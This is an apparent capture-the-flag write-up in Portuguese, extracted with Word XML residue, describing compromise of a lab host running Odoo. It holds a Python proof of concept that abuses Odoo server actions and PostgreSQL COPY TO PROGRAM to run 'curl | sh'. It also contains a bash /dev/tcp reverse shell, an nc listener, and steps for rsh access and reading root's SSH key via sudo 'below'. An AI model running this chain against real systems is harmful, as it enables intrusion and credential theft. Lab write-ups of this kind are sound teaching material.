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wqimp56c687t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qsw8uvkmwc2v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Dodo.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lg0s3a59tsxs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Inicialmente, foi realizada a enumeração das portas com o objetivo de identificar quais serviços estavam expostos no alvo. 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 -p- --open --min-rate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-sVC &lt;MACHINE-IP&gt;-vvv -oN nmap</w:t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38400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Foram identificadas as portas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22/TCP, 80/TCP, 513/TCP e 514/TCP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abertas na máquina alvo. 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-I MACHINE-IP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79500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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fomos redirecionados para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vhost tx.hc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qual foi adicionado ao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Linux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resolução local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DNS.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nano /etc/hosts</w:t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89100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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desse ponto, foi possível acessar a aplicação web. </w:t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68600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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clicar no botão “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Free Trial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”, foi realizado o redirecionamento para outro subdomínio do sistema,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business.tx.hc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632200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Esse subdomínio também foi adicionado ao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sistema para permitir sua resolução local. </w:t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40000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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exploração da aplicação, foi identificada uma área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backup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que permitia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download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arquivos sensíveis, como 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dump.sql. </w:t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82800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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81200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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86100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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analisar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dump.sql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identificar a senha do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armazenada em texto claro. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031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 dump.sql  | grep admin</w:t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admin:thunder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035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05100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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as credenciais armazenadas em texto claro, foi possível obter acesso à aplicação. </w:t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05000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Também foi possível identificar a versão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framework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em uso na aplicação. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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81400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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aplicação, foi identificada uma falha de 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miss configuration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permite a execução remota de comandos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(RCE)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por meio do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COPY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Essa vulnerabilidade está associada à rota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/web/dataset/call_kw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possibilitando a execução de comandos no sistema.  Com o objetivo de obter uma reverse shell, foi utilizado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realizar o download do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shell.sh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 partir da máquina do atacante, seguido de sua execução no sistema alvo.</w:t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nc -lnvp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443 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043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shell.sh </w:t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#!/bin/bash</w:t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/bin/bash -c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 -i &gt;&amp; /dev/tcp/&lt;MACHINE-IP&gt;/443 0&gt;&amp;1'</w:t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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049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4A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PoC: RCE via Server Action + PostgreSQL COPY TO PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B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Requisitos: Admin Odoo + PostgreSQL Superuser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C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4D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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E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URL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"http://business.tx.hc"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050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session = requests.Session()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051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Login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053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session.post(f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{URL}/web/session/authenticate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json={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054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"jsonrpc"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"2.0"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"call"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pacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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"params"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"odoo"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"login"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"admin"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"password"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"thunder"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56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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057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Pegar model ID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059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 = session.post(f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{URL}/web/dataset/call_kw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json={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A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"jsonrpc"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"2.0"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"call"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"params"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"ir.model"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"search"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pacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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[[[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"res.partner"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]]],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"kwargs"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"limit"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5D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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E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model_id = r.json()[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'result'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5F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Criar e executar Server Action com RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061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payload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'env.cr.execute("COPY (SELECT 1) TO PROGRAM \'curl &lt;MACHINE-IP&gt;/shell.sh | sh\'")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062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 = session.post(f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{URL}/web/dataset/call_kw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json={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064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"jsonrpc"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"2.0"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"call"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"params"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"ir.actions.server"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"create"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[{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"model_id"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model_id,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payload}],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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"kwargs"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{}},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068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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069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action_id = r.json()[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'result'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Executar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C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session.post(f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{URL}/web/dataset/call_kw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json={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D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"jsonrpc"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"2.0"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"call"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pacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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"params"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"ir.actions.server"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"run"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[[action_id]],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"kwargs"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{}},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06F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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070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Limpar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072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session.post(f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{URL}/web/dataset/call_kw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json={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073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"jsonrpc"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"2.0"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"call"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pacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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"params"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"ir.actions.server"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"unlink"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[[action_id]],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"kwargs"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{}},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075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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076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"Verificar: docker exec odoo_vuln_db cat /tmp/rce.txt"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63600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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foi possível obter uma reverse shell na aplicação web. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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03300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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9qmedushh2a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3upy8ejvgad4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Posteriormente, foi realizada nova enumeração de portas, sendo identificada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513/TCP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associada ao serviço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rlogin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conhecido por suas fragilidades de segurança. Diante disso, foi realizada uma tentativa de conexão utilizando o mesmo usuário da máquina, sem a necessidade de senha.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ss -anlpt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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Foram identificados dois usuários no sistema,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tx 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ubuntu.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foi realizada uma tentativa de conexão ao serviço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rsh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utilizando o usuário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tx.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 -al /home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25400" l="25400" r="25400" t="2540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possível obter acesso ao sistema utilizando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tx.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rsh tx@&lt;MACHINE-IP&gt;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59200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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usuário se  encontra no diretório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/home/tx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87500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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executar o comando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sudo -l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identificado que o usuário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tx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possui permissão para executar o comando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below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root,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sem necessidade de senha. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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11200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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binário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below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também permite a leitura de arquivos arbitrários no sistema. Dessa forma, foi possível acessar a chave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id_rsa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/usr/bin/below --config /root/.ssh/id_rsa live </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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00400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Desta forma, foi possível obter acesso ao sistema com privilégios do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619500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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se encontra no diretório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/root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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81200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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headerReference r:id="rId30" w:type="default"/>
      <w:headerReference r:id="rId31" w:type="first"/>
      <w:headerReference r:id="rId32" w:type="even"/>
      <w:footerReference r:id="rId33" w:type="default"/>
      <w:footerReference r:id="rId34" w:type="first"/>
      <w:footerReference r:id="rId35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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6vrogorm36q9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11" name="image11.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image11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3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5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1" name="image24.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image24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04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Dodo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0435"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="1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04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25.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19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0.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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7.png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12.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16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jpg"/><Relationship Id="rId2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4.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26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VlddGGj5FhD0Sgs+gFp/OOlgiw==">CgMxLjAyDmgud3FpbXA1NmM2ODd0Mg5oLnFzdzh1dmttd2MydjIOaC5sZzBzM2E1OXRzeHMyDWguOXFtZWR1c2hoMmEyDmguM3VweThlanZnYWQ0Mg5oLjZ2cm9nb3JtMzZxOTgAciExdTkycHdmMUJhNmpzSC1KNld5b045d3MteTFwbWRrem4=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